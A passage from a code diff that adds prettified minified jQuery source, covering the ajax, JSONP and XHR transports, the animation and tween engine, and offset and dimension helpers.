').append(b.parseHTML(e)).find(i)
+ : e,
+ );
+ })
+ .complete(
+ r &&
+ function (e, t) {
+ s.each(r, o || [e.responseText, t, e]);
+ },
+ ),
+ this
+ );
+ }),
+ b.each(
+ [
+ 'ajaxStart',
+ 'ajaxStop',
+ 'ajaxComplete',
+ 'ajaxError',
+ 'ajaxSuccess',
+ 'ajaxSend',
+ ],
+ function (e, t) {
+ b.fn[t] = function (e) {
+ return this.on(t, e);
+ };
+ },
+ ),
+ b.each(['get', 'post'], function (e, n) {
+ b[n] = function (e, r, i, o) {
+ return (
+ b.isFunction(r) && ((o = o || i), (i = r), (r = t)),
+ b.ajax({url: e, type: n, dataType: o, data: r, success: i})
+ );
+ };
+ }),
+ b.extend({
+ active: 0,
+ lastModified: {},
+ etag: {},
+ ajaxSettings: {
+ url: yn,
+ type: 'GET',
+ isLocal: Nn.test(mn[1]),
+ global: !0,
+ processData: !0,
+ async: !0,
+ contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
+ accepts: {
+ '*': Dn,
+ text: 'text/plain',
+ html: 'text/html',
+ xml: 'application/xml, text/xml',
+ json: 'application/json, text/javascript',
+ },
+ contents: {xml: /xml/, html: /html/, json: /json/},
+ responseFields: {xml: 'responseXML', text: 'responseText'},
+ converters: {
+ '* text': e.String,
+ 'text html': !0,
+ 'text json': b.parseJSON,
+ 'text xml': b.parseXML,
+ },
+ flatOptions: {url: !0, context: !0},
+ },
+ ajaxSetup: function (e, t) {
+ return t ? Mn(Mn(e, b.ajaxSettings), t) : Mn(b.ajaxSettings, e);
+ },
+ ajaxPrefilter: Hn(An),
+ ajaxTransport: Hn(jn),
+ ajax: function (e, n) {
+ 'object' == typeof e && ((n = e), (e = t)), (n = n || {});
+ var r,
+ i,
+ o,
+ a,
+ s,
+ u,
+ l,
+ c,
+ p = b.ajaxSetup({}, n),
+ f = p.context || p,
+ d = p.context && (f.nodeType || f.jquery) ? b(f) : b.event,
+ h = b.Deferred(),
+ g = b.Callbacks('once memory'),
+ m = p.statusCode || {},
+ y = {},
+ v = {},
+ x = 0,
+ T = 'canceled',
+ N = {
+ readyState: 0,
+ getResponseHeader: function (e) {
+ var t;
+ if (2 === x) {
+ if (!c) {
+ c = {};
+ while ((t = Tn.exec(a)))
+ c[t[1].toLowerCase()] = t[2];
+ }
+ t = c[e.toLowerCase()];
+ }
+ return null == t ? null : t;
+ },
+ getAllResponseHeaders: function () {
+ return 2 === x ? a : null;
+ },
+ setRequestHeader: function (e, t) {
+ var n = e.toLowerCase();
+ return (
+ x || ((e = v[n] = v[n] || e), (y[e] = t)), this
+ );
+ },
+ overrideMimeType: function (e) {
+ return x || (p.mimeType = e), this;
+ },
+ statusCode: function (e) {
+ var t;
+ if (e)
+ if (2 > x) for (t in e) m[t] = [m[t], e[t]];
+ else N.always(e[N.status]);
+ return this;
+ },
+ abort: function (e) {
+ var t = e || T;
+ return l && l.abort(t), k(0, t), this;
+ },
+ };
+ if (
+ ((h.promise(N).complete = g.add),
+ (N.success = N.done),
+ (N.error = N.fail),
+ (p.url = ((e || p.url || yn) + '')
+ .replace(xn, '')
+ .replace(kn, mn[1] + '//')),
+ (p.type = n.method || n.type || p.method || p.type),
+ (p.dataTypes = b
+ .trim(p.dataType || '*')
+ .toLowerCase()
+ .match(w) || ['']),
+ null == p.crossDomain &&
+ ((r = En.exec(p.url.toLowerCase())),
+ (p.crossDomain = !(
+ !r ||
+ (r[1] === mn[1] &&
+ r[2] === mn[2] &&
+ (r[3] || ('http:' === r[1] ? 80 : 443)) ==
+ (mn[3] || ('http:' === mn[1] ? 80 : 443)))
+ ))),
+ p.data &&
+ p.processData &&
+ 'string' != typeof p.data &&
+ (p.data = b.param(p.data, p.traditional)),
+ qn(An, p, n, N),
+ 2 === x)
+ )
+ return N;
+ (u = p.global),
+ u && 0 === b.active++ && b.event.trigger('ajaxStart'),
+ (p.type = p.type.toUpperCase()),
+ (p.hasContent = !Cn.test(p.type)),
+ (o = p.url),
+ p.hasContent ||
+ (p.data &&
+ ((o = p.url += (bn.test(o) ? '&' : '?') + p.data),
+ delete p.data),
+ p.cache === !1 &&
+ (p.url = wn.test(o)
+ ? o.replace(wn, '$1_=' + vn++)
+ : o + (bn.test(o) ? '&' : '?') + '_=' + vn++)),
+ p.ifModified &&
+ (b.lastModified[o] &&
+ N.setRequestHeader(
+ 'If-Modified-Since',
+ b.lastModified[o],
+ ),
+ b.etag[o] &&
+ N.setRequestHeader('If-None-Match', b.etag[o])),
+ ((p.data && p.hasContent && p.contentType !== !1) ||
+ n.contentType) &&
+ N.setRequestHeader('Content-Type', p.contentType),
+ N.setRequestHeader(
+ 'Accept',
+ p.dataTypes[0] && p.accepts[p.dataTypes[0]]
+ ? p.accepts[p.dataTypes[0]] +
+ ('*' !== p.dataTypes[0]
+ ? ', ' + Dn + '; q=0.01'
+ : '')
+ : p.accepts['*'],
+ );
+ for (i in p.headers) N.setRequestHeader(i, p.headers[i]);
+ if (
+ p.beforeSend &&
+ (p.beforeSend.call(f, N, p) === !1 || 2 === x)
+ )
+ return N.abort();
+ T = 'abort';
+ for (i in {success: 1, error: 1, complete: 1}) N[i](p[i]);
+ if ((l = qn(jn, p, n, N))) {
+ (N.readyState = 1),
+ u && d.trigger('ajaxSend', [N, p]),
+ p.async &&
+ p.timeout > 0 &&
+ (s = setTimeout(function () {
+ N.abort('timeout');
+ }, p.timeout));
+ try {
+ (x = 1), l.send(y, k);
+ } catch (C) {
+ if (!(2 > x)) throw C;
+ k(-1, C);
+ }
+ } else k(-1, 'No Transport');
+ function k(e, n, r, i) {
+ var c,
+ y,
+ v,
+ w,
+ T,
+ C = n;
+ 2 !== x &&
+ ((x = 2),
+ s && clearTimeout(s),
+ (l = t),
+ (a = i || ''),
+ (N.readyState = e > 0 ? 4 : 0),
+ r && (w = _n(p, N, r)),
+ (e >= 200 && 300 > e) || 304 === e
+ ? (p.ifModified &&
+ ((T = N.getResponseHeader('Last-Modified')),
+ T && (b.lastModified[o] = T),
+ (T = N.getResponseHeader('etag')),
+ T && (b.etag[o] = T)),
+ 204 === e
+ ? ((c = !0), (C = 'nocontent'))
+ : 304 === e
+ ? ((c = !0), (C = 'notmodified'))
+ : ((c = Fn(p, w)),
+ (C = c.state),
+ (y = c.data),
+ (v = c.error),
+ (c = !v)))
+ : ((v = C),
+ (e || !C) && ((C = 'error'), 0 > e && (e = 0))),
+ (N.status = e),
+ (N.statusText = (n || C) + ''),
+ c
+ ? h.resolveWith(f, [y, C, N])
+ : h.rejectWith(f, [N, C, v]),
+ N.statusCode(m),
+ (m = t),
+ u &&
+ d.trigger(c ? 'ajaxSuccess' : 'ajaxError', [
+ N,
+ p,
+ c ? y : v,
+ ]),
+ g.fireWith(f, [N, C]),
+ u &&
+ (d.trigger('ajaxComplete', [N, p]),
+ --b.active || b.event.trigger('ajaxStop')));
+ }
+ return N;
+ },
+ getScript: function (e, n) {
+ return b.get(e, t, n, 'script');
+ },
+ getJSON: function (e, t, n) {
+ return b.get(e, t, n, 'json');
+ },
+ });
+ function _n(e, n, r) {
+ var i,
+ o,
+ a,
+ s,
+ u = e.contents,
+ l = e.dataTypes,
+ c = e.responseFields;
+ for (s in c) s in r && (n[c[s]] = r[s]);
+ while ('*' === l[0])
+ l.shift(),
+ o === t &&
+ (o = e.mimeType || n.getResponseHeader('Content-Type'));
+ if (o)
+ for (s in u)
+ if (u[s] && u[s].test(o)) {
+ l.unshift(s);
+ break;
+ }
+ if (l[0] in r) a = l[0];
+ else {
+ for (s in r) {
+ if (!l[0] || e.converters[s + ' ' + l[0]]) {
+ a = s;
+ break;
+ }
+ i || (i = s);
+ }
+ a = a || i;
+ }
+ return a ? (a !== l[0] && l.unshift(a), r[a]) : t;
+ }
+ function Fn(e, t) {
+ var n,
+ r,
+ i,
+ o,
+ a = {},
+ s = 0,
+ u = e.dataTypes.slice(),
+ l = u[0];
+ if ((e.dataFilter && (t = e.dataFilter(t, e.dataType)), u[1]))
+ for (i in e.converters) a[i.toLowerCase()] = e.converters[i];
+ for (; (r = u[++s]); )
+ if ('*' !== r) {
+ if ('*' !== l && l !== r) {
+ if (((i = a[l + ' ' + r] || a['* ' + r]), !i))
+ for (n in a)
+ if (
+ ((o = n.split(' ')),
+ o[1] === r &&
+ (i = a[l + ' ' + o[0]] || a['* ' + o[0]]))
+ ) {
+ i === !0
+ ? (i = a[n])
+ : a[n] !== !0 &&
+ ((r = o[0]), u.splice(s--, 0, r));
+ break;
+ }
+ if (i !== !0)
+ if (i && e['throws']) t = i(t);
+ else
+ try {
+ t = i(t);
+ } catch (c) {
+ return {
+ state: 'parsererror',
+ error: i
+ ? c
+ : 'No conversion from ' +
+ l +
+ ' to ' +
+ r,
+ };
+ }
+ }
+ l = r;
+ }
+ return {state: 'success', data: t};
+ }
+ b.ajaxSetup({
+ accepts: {
+ script: 'text/javascript, application/javascript, application/ecmascript, application/x-ecmascript',
+ },
+ contents: {script: /(?:java|ecma)script/},
+ converters: {
+ 'text script': function (e) {
+ return b.globalEval(e), e;
+ },
+ },
+ }),
+ b.ajaxPrefilter('script', function (e) {
+ e.cache === t && (e.cache = !1),
+ e.crossDomain && ((e.type = 'GET'), (e.global = !1));
+ }),
+ b.ajaxTransport('script', function (e) {
+ if (e.crossDomain) {
+ var n,
+ r = o.head || b('head')[0] || o.documentElement;
+ return {
+ send: function (t, i) {
+ (n = o.createElement('script')),
+ (n.async = !0),
+ e.scriptCharset && (n.charset = e.scriptCharset),
+ (n.src = e.url),
+ (n.onload = n.onreadystatechange =
+ function (e, t) {
+ (t ||
+ !n.readyState ||
+ /loaded|complete/.test(n.readyState)) &&
+ ((n.onload = n.onreadystatechange =
+ null),
+ n.parentNode &&
+ n.parentNode.removeChild(n),
+ (n = null),
+ t || i(200, 'success'));
+ }),
+ r.insertBefore(n, r.firstChild);
+ },
+ abort: function () {
+ n && n.onload(t, !0);
+ },
+ };
+ }
+ });
+ var On = [],
+ Bn = /(=)\?(?=&|$)|\?\?/;
+ b.ajaxSetup({
+ jsonp: 'callback',
+ jsonpCallback: function () {
+ var e = On.pop() || b.expando + '_' + vn++;
+ return (this[e] = !0), e;
+ },
+ }),
+ b.ajaxPrefilter('json jsonp', function (n, r, i) {
+ var o,
+ a,
+ s,
+ u =
+ n.jsonp !== !1 &&
+ (Bn.test(n.url)
+ ? 'url'
+ : 'string' == typeof n.data &&
+ !(n.contentType || '').indexOf(
+ 'application/x-www-form-urlencoded',
+ ) &&
+ Bn.test(n.data) &&
+ 'data');
+ return u || 'jsonp' === n.dataTypes[0]
+ ? ((o = n.jsonpCallback =
+ b.isFunction(n.jsonpCallback)
+ ? n.jsonpCallback()
+ : n.jsonpCallback),
+ u
+ ? (n[u] = n[u].replace(Bn, '$1' + o))
+ : n.jsonp !== !1 &&
+ (n.url +=
+ (bn.test(n.url) ? '&' : '?') + n.jsonp + '=' + o),
+ (n.converters['script json'] = function () {
+ return s || b.error(o + ' was not called'), s[0];
+ }),
+ (n.dataTypes[0] = 'json'),
+ (a = e[o]),
+ (e[o] = function () {
+ s = arguments;
+ }),
+ i.always(function () {
+ (e[o] = a),
+ n[o] &&
+ ((n.jsonpCallback = r.jsonpCallback), On.push(o)),
+ s && b.isFunction(a) && a(s[0]),
+ (s = a = t);
+ }),
+ 'script')
+ : t;
+ });
+ var Pn,
+ Rn,
+ Wn = 0,
+ $n =
+ e.ActiveXObject &&
+ function () {
+ var e;
+ for (e in Pn) Pn[e](t, !0);
+ };
+ function In() {
+ try {
+ return new e.XMLHttpRequest();
+ } catch (t) {}
+ }
+ function zn() {
+ try {
+ return new e.ActiveXObject('Microsoft.XMLHTTP');
+ } catch (t) {}
+ }
+ (b.ajaxSettings.xhr = e.ActiveXObject
+ ? function () {
+ return (!this.isLocal && In()) || zn();
+ }
+ : In),
+ (Rn = b.ajaxSettings.xhr()),
+ (b.support.cors = !!Rn && 'withCredentials' in Rn),
+ (Rn = b.support.ajax = !!Rn),
+ Rn &&
+ b.ajaxTransport(function (n) {
+ if (!n.crossDomain || b.support.cors) {
+ var r;
+ return {
+ send: function (i, o) {
+ var a,
+ s,
+ u = n.xhr();
+ if (
+ (n.username
+ ? u.open(
+ n.type,
+ n.url,
+ n.async,
+ n.username,
+ n.password,
+ )
+ : u.open(n.type, n.url, n.async),
+ n.xhrFields)
+ )
+ for (s in n.xhrFields) u[s] = n.xhrFields[s];
+ n.mimeType &&
+ u.overrideMimeType &&
+ u.overrideMimeType(n.mimeType),
+ n.crossDomain ||
+ i['X-Requested-With'] ||
+ (i['X-Requested-With'] = 'XMLHttpRequest');
+ try {
+ for (s in i) u.setRequestHeader(s, i[s]);
+ } catch (l) {}
+ u.send((n.hasContent && n.data) || null),
+ (r = function (e, i) {
+ var s, l, c, p;
+ try {
+ if (r && (i || 4 === u.readyState))
+ if (
+ ((r = t),
+ a &&
+ ((u.onreadystatechange =
+ b.noop),
+ $n && delete Pn[a]),
+ i)
+ )
+ 4 !== u.readyState && u.abort();
+ else {
+ (p = {}),
+ (s = u.status),
+ (l =
+ u.getAllResponseHeaders()),
+ 'string' ==
+ typeof u.responseText &&
+ (p.text =
+ u.responseText);
+ try {
+ c = u.statusText;
+ } catch (f) {
+ c = '';
+ }
+ s || !n.isLocal || n.crossDomain
+ ? 1223 === s && (s = 204)
+ : (s = p.text ? 200 : 404);
+ }
+ } catch (d) {
+ i || o(-1, d);
+ }
+ p && o(s, c, p, l);
+ }),
+ n.async
+ ? 4 === u.readyState
+ ? setTimeout(r)
+ : ((a = ++Wn),
+ $n &&
+ (Pn ||
+ ((Pn = {}), b(e).unload($n)),
+ (Pn[a] = r)),
+ (u.onreadystatechange = r))
+ : r();
+ },
+ abort: function () {
+ r && r(t, !0);
+ },
+ };
+ }
+ });
+ var Xn,
+ Un,
+ Vn = /^(?:toggle|show|hide)$/,
+ Yn = RegExp('^(?:([+-])=|)(' + x + ')([a-z%]*)$', 'i'),
+ Jn = /queueHooks$/,
+ Gn = [nr],
+ Qn = {
+ '*': [
+ function (e, t) {
+ var n,
+ r,
+ i = this.createTween(e, t),
+ o = Yn.exec(t),
+ a = i.cur(),
+ s = +a || 0,
+ u = 1,
+ l = 20;
+ if (o) {
+ if (
+ ((n = +o[2]),
+ (r = o[3] || (b.cssNumber[e] ? '' : 'px')),
+ 'px' !== r && s)
+ ) {
+ s = b.css(i.elem, e, !0) || n || 1;
+ do
+ (u = u || '.5'),
+ (s /= u),
+ b.style(i.elem, e, s + r);
+ while (u !== (u = i.cur() / a) && 1 !== u && --l);
+ }
+ (i.unit = r),
+ (i.start = s),
+ (i.end = o[1] ? s + (o[1] + 1) * n : n);
+ }
+ return i;
+ },
+ ],
+ };
+ function Kn() {
+ return (
+ setTimeout(function () {
+ Xn = t;
+ }),
+ (Xn = b.now())
+ );
+ }
+ function Zn(e, t) {
+ b.each(t, function (t, n) {
+ var r = (Qn[t] || []).concat(Qn['*']),
+ i = 0,
+ o = r.length;
+ for (; o > i; i++) if (r[i].call(e, t, n)) return;
+ });
+ }
+ function er(e, t, n) {
+ var r,
+ i,
+ o = 0,
+ a = Gn.length,
+ s = b.Deferred().always(function () {
+ delete u.elem;
+ }),
+ u = function () {
+ if (i) return !1;
+ var t = Xn || Kn(),
+ n = Math.max(0, l.startTime + l.duration - t),
+ r = n / l.duration || 0,
+ o = 1 - r,
+ a = 0,
+ u = l.tweens.length;
+ for (; u > a; a++) l.tweens[a].run(o);
+ return (
+ s.notifyWith(e, [l, o, n]),
+ 1 > o && u ? n : (s.resolveWith(e, [l]), !1)
+ );
+ },
+ l = s.promise({
+ elem: e,
+ props: b.extend({}, t),
+ opts: b.extend(!0, {specialEasing: {}}, n),
+ originalProperties: t,
+ originalOptions: n,
+ startTime: Xn || Kn(),
+ duration: n.duration,
+ tweens: [],
+ createTween: function (t, n) {
+ var r = b.Tween(
+ e,
+ l.opts,
+ t,
+ n,
+ l.opts.specialEasing[t] || l.opts.easing,
+ );
+ return l.tweens.push(r), r;
+ },
+ stop: function (t) {
+ var n = 0,
+ r = t ? l.tweens.length : 0;
+ if (i) return this;
+ for (i = !0; r > n; n++) l.tweens[n].run(1);
+ return (
+ t ? s.resolveWith(e, [l, t]) : s.rejectWith(e, [l, t]),
+ this
+ );
+ },
+ }),
+ c = l.props;
+ for (tr(c, l.opts.specialEasing); a > o; o++)
+ if ((r = Gn[o].call(l, e, c, l.opts))) return r;
+ return (
+ Zn(l, c),
+ b.isFunction(l.opts.start) && l.opts.start.call(e, l),
+ b.fx.timer(b.extend(u, {elem: e, anim: l, queue: l.opts.queue})),
+ l
+ .progress(l.opts.progress)
+ .done(l.opts.done, l.opts.complete)
+ .fail(l.opts.fail)
+ .always(l.opts.always)
+ );
+ }
+ function tr(e, t) {
+ var n, r, i, o, a;
+ for (i in e)
+ if (
+ ((r = b.camelCase(i)),
+ (o = t[r]),
+ (n = e[i]),
+ b.isArray(n) && ((o = n[1]), (n = e[i] = n[0])),
+ i !== r && ((e[r] = n), delete e[i]),
+ (a = b.cssHooks[r]),
+ a && 'expand' in a)
+ ) {
+ (n = a.expand(n)), delete e[r];
+ for (i in n) i in e || ((e[i] = n[i]), (t[i] = o));
+ } else t[r] = o;
+ }
+ b.Animation = b.extend(er, {
+ tweener: function (e, t) {
+ b.isFunction(e) ? ((t = e), (e = ['*'])) : (e = e.split(' '));
+ var n,
+ r = 0,
+ i = e.length;
+ for (; i > r; r++)
+ (n = e[r]), (Qn[n] = Qn[n] || []), Qn[n].unshift(t);
+ },
+ prefilter: function (e, t) {
+ t ? Gn.unshift(e) : Gn.push(e);
+ },
+ });
+ function nr(e, t, n) {
+ var r,
+ i,
+ o,
+ a,
+ s,
+ u,
+ l,
+ c,
+ p,
+ f = this,
+ d = e.style,
+ h = {},
+ g = [],
+ m = e.nodeType && nn(e);
+ n.queue ||
+ ((c = b._queueHooks(e, 'fx')),
+ null == c.unqueued &&
+ ((c.unqueued = 0),
+ (p = c.empty.fire),
+ (c.empty.fire = function () {
+ c.unqueued || p();
+ })),
+ c.unqueued++,
+ f.always(function () {
+ f.always(function () {
+ c.unqueued--, b.queue(e, 'fx').length || c.empty.fire();
+ });
+ })),
+ 1 === e.nodeType &&
+ ('height' in t || 'width' in t) &&
+ ((n.overflow = [d.overflow, d.overflowX, d.overflowY]),
+ 'inline' === b.css(e, 'display') &&
+ 'none' === b.css(e, 'float') &&
+ (b.support.inlineBlockNeedsLayout &&
+ 'inline' !== un(e.nodeName)
+ ? (d.zoom = 1)
+ : (d.display = 'inline-block'))),
+ n.overflow &&
+ ((d.overflow = 'hidden'),
+ b.support.shrinkWrapBlocks ||
+ f.always(function () {
+ (d.overflow = n.overflow[0]),
+ (d.overflowX = n.overflow[1]),
+ (d.overflowY = n.overflow[2]);
+ }));
+ for (i in t)
+ if (((a = t[i]), Vn.exec(a))) {
+ if (
+ (delete t[i],
+ (u = u || 'toggle' === a),
+ a === (m ? 'hide' : 'show'))
+ )
+ continue;
+ g.push(i);
+ }
+ if ((o = g.length)) {
+ (s = b._data(e, 'fxshow') || b._data(e, 'fxshow', {})),
+ 'hidden' in s && (m = s.hidden),
+ u && (s.hidden = !m),
+ m
+ ? b(e).show()
+ : f.done(function () {
+ b(e).hide();
+ }),
+ f.done(function () {
+ var t;
+ b._removeData(e, 'fxshow');
+ for (t in h) b.style(e, t, h[t]);
+ });
+ for (i = 0; o > i; i++)
+ (r = g[i]),
+ (l = f.createTween(r, m ? s[r] : 0)),
+ (h[r] = s[r] || b.style(e, r)),
+ r in s ||
+ ((s[r] = l.start),
+ m &&
+ ((l.end = l.start),
+ (l.start =
+ 'width' === r || 'height' === r ? 1 : 0)));
+ }
+ }
+ function rr(e, t, n, r, i) {
+ return new rr.prototype.init(e, t, n, r, i);
+ }
+ (b.Tween = rr),
+ (rr.prototype = {
+ constructor: rr,
+ init: function (e, t, n, r, i, o) {
+ (this.elem = e),
+ (this.prop = n),
+ (this.easing = i || 'swing'),
+ (this.options = t),
+ (this.start = this.now = this.cur()),
+ (this.end = r),
+ (this.unit = o || (b.cssNumber[n] ? '' : 'px'));
+ },
+ cur: function () {
+ var e = rr.propHooks[this.prop];
+ return e && e.get
+ ? e.get(this)
+ : rr.propHooks._default.get(this);
+ },
+ run: function (e) {
+ var t,
+ n = rr.propHooks[this.prop];
+ return (
+ (this.pos = t =
+ this.options.duration
+ ? b.easing[this.easing](
+ e,
+ this.options.duration * e,
+ 0,
+ 1,
+ this.options.duration,
+ )
+ : e),
+ (this.now = (this.end - this.start) * t + this.start),
+ this.options.step &&
+ this.options.step.call(this.elem, this.now, this),
+ n && n.set ? n.set(this) : rr.propHooks._default.set(this),
+ this
+ );
+ },
+ }),
+ (rr.prototype.init.prototype = rr.prototype),
+ (rr.propHooks = {
+ _default: {
+ get: function (e) {
+ var t;
+ return null == e.elem[e.prop] ||
+ (e.elem.style && null != e.elem.style[e.prop])
+ ? ((t = b.css(e.elem, e.prop, '')),
+ t && 'auto' !== t ? t : 0)
+ : e.elem[e.prop];
+ },
+ set: function (e) {
+ b.fx.step[e.prop]
+ ? b.fx.step[e.prop](e)
+ : e.elem.style &&
+ (null != e.elem.style[b.cssProps[e.prop]] ||
+ b.cssHooks[e.prop])
+ ? b.style(e.elem, e.prop, e.now + e.unit)
+ : (e.elem[e.prop] = e.now);
+ },
+ },
+ }),
+ (rr.propHooks.scrollTop = rr.propHooks.scrollLeft =
+ {
+ set: function (e) {
+ e.elem.nodeType &&
+ e.elem.parentNode &&
+ (e.elem[e.prop] = e.now);
+ },
+ }),
+ b.each(['toggle', 'show', 'hide'], function (e, t) {
+ var n = b.fn[t];
+ b.fn[t] = function (e, r, i) {
+ return null == e || 'boolean' == typeof e
+ ? n.apply(this, arguments)
+ : this.animate(ir(t, !0), e, r, i);
+ };
+ }),
+ b.fn.extend({
+ fadeTo: function (e, t, n, r) {
+ return this.filter(nn)
+ .css('opacity', 0)
+ .show()
+ .end()
+ .animate({opacity: t}, e, n, r);
+ },
+ animate: function (e, t, n, r) {
+ var i = b.isEmptyObject(e),
+ o = b.speed(t, n, r),
+ a = function () {
+ var t = er(this, b.extend({}, e), o);
+ (a.finish = function () {
+ t.stop(!0);
+ }),
+ (i || b._data(this, 'finish')) && t.stop(!0);
+ };
+ return (
+ (a.finish = a),
+ i || o.queue === !1 ? this.each(a) : this.queue(o.queue, a)
+ );
+ },
+ stop: function (e, n, r) {
+ var i = function (e) {
+ var t = e.stop;
+ delete e.stop, t(r);
+ };
+ return (
+ 'string' != typeof e && ((r = n), (n = e), (e = t)),
+ n && e !== !1 && this.queue(e || 'fx', []),
+ this.each(function () {
+ var t = !0,
+ n = null != e && e + 'queueHooks',
+ o = b.timers,
+ a = b._data(this);
+ if (n) a[n] && a[n].stop && i(a[n]);
+ else
+ for (n in a)
+ a[n] && a[n].stop && Jn.test(n) && i(a[n]);
+ for (n = o.length; n--; )
+ o[n].elem !== this ||
+ (null != e && o[n].queue !== e) ||
+ (o[n].anim.stop(r), (t = !1), o.splice(n, 1));
+ (t || !r) && b.dequeue(this, e);
+ })
+ );
+ },
+ finish: function (e) {
+ return (
+ e !== !1 && (e = e || 'fx'),
+ this.each(function () {
+ var t,
+ n = b._data(this),
+ r = n[e + 'queue'],
+ i = n[e + 'queueHooks'],
+ o = b.timers,
+ a = r ? r.length : 0;
+ for (
+ n.finish = !0,
+ b.queue(this, e, []),
+ i &&
+ i.cur &&
+ i.cur.finish &&
+ i.cur.finish.call(this),
+ t = o.length;
+ t--;
+
+ )
+ o[t].elem === this &&
+ o[t].queue === e &&
+ (o[t].anim.stop(!0), o.splice(t, 1));
+ for (t = 0; a > t; t++)
+ r[t] && r[t].finish && r[t].finish.call(this);
+ delete n.finish;
+ })
+ );
+ },
+ });
+ function ir(e, t) {
+ var n,
+ r = {height: e},
+ i = 0;
+ for (t = t ? 1 : 0; 4 > i; i += 2 - t)
+ (n = Zt[i]), (r['margin' + n] = r['padding' + n] = e);
+ return t && (r.opacity = r.width = e), r;
+ }
+ b.each(
+ {
+ slideDown: ir('show'),
+ slideUp: ir('hide'),
+ slideToggle: ir('toggle'),
+ fadeIn: {opacity: 'show'},
+ fadeOut: {opacity: 'hide'},
+ fadeToggle: {opacity: 'toggle'},
+ },
+ function (e, t) {
+ b.fn[e] = function (e, n, r) {
+ return this.animate(t, e, n, r);
+ };
+ },
+ ),
+ (b.speed = function (e, t, n) {
+ var r =
+ e && 'object' == typeof e
+ ? b.extend({}, e)
+ : {
+ complete: n || (!n && t) || (b.isFunction(e) && e),
+ duration: e,
+ easing: (n && t) || (t && !b.isFunction(t) && t),
+ };
+ return (
+ (r.duration = b.fx.off
+ ? 0
+ : 'number' == typeof r.duration
+ ? r.duration
+ : r.duration in b.fx.speeds
+ ? b.fx.speeds[r.duration]
+ : b.fx.speeds._default),
+ (null == r.queue || r.queue === !0) && (r.queue = 'fx'),
+ (r.old = r.complete),
+ (r.complete = function () {
+ b.isFunction(r.old) && r.old.call(this),
+ r.queue && b.dequeue(this, r.queue);
+ }),
+ r
+ );
+ }),
+ (b.easing = {
+ linear: function (e) {
+ return e;
+ },
+ swing: function (e) {
+ return 0.5 - Math.cos(e * Math.PI) / 2;
+ },
+ }),
+ (b.timers = []),
+ (b.fx = rr.prototype.init),
+ (b.fx.tick = function () {
+ var e,
+ n = b.timers,
+ r = 0;
+ for (Xn = b.now(); n.length > r; r++)
+ (e = n[r]), e() || n[r] !== e || n.splice(r--, 1);
+ n.length || b.fx.stop(), (Xn = t);
+ }),
+ (b.fx.timer = function (e) {
+ e() && b.timers.push(e) && b.fx.start();
+ }),
+ (b.fx.interval = 13),
+ (b.fx.start = function () {
+ Un || (Un = setInterval(b.fx.tick, b.fx.interval));
+ }),
+ (b.fx.stop = function () {
+ clearInterval(Un), (Un = null);
+ }),
+ (b.fx.speeds = {slow: 600, fast: 200, _default: 400}),
+ (b.fx.step = {}),
+ b.expr &&
+ b.expr.filters &&
+ (b.expr.filters.animated = function (e) {
+ return b.grep(b.timers, function (t) {
+ return e === t.elem;
+ }).length;
+ }),
+ (b.fn.offset = function (e) {
+ if (arguments.length)
+ return e === t
+ ? this
+ : this.each(function (t) {
+ b.offset.setOffset(this, e, t);
+ });
+ var n,
+ r,
+ o = {top: 0, left: 0},
+ a = this[0],
+ s = a && a.ownerDocument;
+ if (s)
+ return (
+ (n = s.documentElement),
+ b.contains(n, a)
+ ? (typeof a.getBoundingClientRect !== i &&
+ (o = a.getBoundingClientRect()),
+ (r = or(s)),
+ {
+ top:
+ o.top +
+ (r.pageYOffset || n.scrollTop) -
+ (n.clientTop || 0),
+ left:
+ o.left +
+ (r.pageXOffset || n.scrollLeft) -
+ (n.clientLeft || 0),
+ })
+ : o
+ );
+ }),
+ (b.offset = {
+ setOffset: function (e, t, n) {
+ var r = b.css(e, 'position');
+ 'static' === r && (e.style.position = 'relative');
+ var i = b(e),
+ o = i.offset(),
+ a = b.css(e, 'top'),
+ s = b.css(e, 'left'),
+ u =
+ ('absolute' === r || 'fixed' === r) &&
+ b.inArray('auto', [a, s]) > -1,
+ l = {},
+ c = {},
+ p,
+ f;
+ u
+ ? ((c = i.position()), (p = c.top), (f = c.left))
+ : ((p = parseFloat(a) || 0), (f = parseFloat(s) || 0)),
+ b.isFunction(t) && (t = t.call(e, n, o)),
+ null != t.top && (l.top = t.top - o.top + p),
+ null != t.left && (l.left = t.left - o.left + f),
+ 'using' in t ? t.using.call(e, l) : i.css(l);
+ },
+ }),
+ b.fn.extend({
+ position: function () {
+ if (this[0]) {
+ var e,
+ t,
+ n = {top: 0, left: 0},
+ r = this[0];
+ return (
+ 'fixed' === b.css(r, 'position')
+ ? (t = r.getBoundingClientRect())
+ : ((e = this.offsetParent()),
+ (t = this.offset()),
+ b.nodeName(e[0], 'html') || (n = e.offset()),
+ (n.top += b.css(e[0], 'borderTopWidth', !0)),
+ (n.left += b.css(e[0], 'borderLeftWidth', !0))),
+ {
+ top: t.top - n.top - b.css(r, 'marginTop', !0),
+ left: t.left - n.left - b.css(r, 'marginLeft', !0),
+ }
+ );
+ }
+ },
+ offsetParent: function () {
+ return this.map(function () {
+ var e = this.offsetParent || o.documentElement;
+ while (
+ e &&
+ !b.nodeName(e, 'html') &&
+ 'static' === b.css(e, 'position')
+ )
+ e = e.offsetParent;
+ return e || o.documentElement;
+ });
+ },
+ }),
+ b.each(
+ {scrollLeft: 'pageXOffset', scrollTop: 'pageYOffset'},
+ function (e, n) {
+ var r = /Y/.test(n);
+ b.fn[e] = function (i) {
+ return b.access(
+ this,
+ function (e, i, o) {
+ var a = or(e);
+ return o === t
+ ? a
+ ? n in a
+ ? a[n]
+ : a.document.documentElement[i]
+ : e[i]
+ : (a
+ ? a.scrollTo(
+ r ? b(a).scrollLeft() : o,
+ r ? o : b(a).scrollTop(),
+ )
+ : (e[i] = o),
+ t);
+ },
+ e,
+ i,
+ arguments.length,
+ null,
+ );
+ };
+ },
+ );
+ function or(e) {
+ return b.isWindow(e)
+ ? e
+ : 9 === e.nodeType
+ ? e.defaultView || e.parentWindow
+ : !1;
+ }
+ b.each({Height: 'height', Width: 'width'}, function (e, n) {
+ b.each(
+ {padding: 'inner' + e, content: n, '': 'outer' + e},
+ function (r, i) {
+ b.fn[i] = function (i, o) {
+ var a = arguments.length && (r || 'boolean' != typeof i),
+ s = r || (i === !0 || o === !0 ? 'margin' : 'border');
+ return b.access(
+ this,
+ function (n, r, i) {
+ var o;
+ return b.isWindow(n)
+ ? n.document.documentElement['client' + e]
+ : 9 === n.nodeType
+ ? ((o = n.documentElement),
+ Math.max(
+ n.body['scroll' + e],
+ o['scroll' + e],
+ n.body['offset' + e],
+ o['offset' + e],
+ o['client' + e],
+ ))
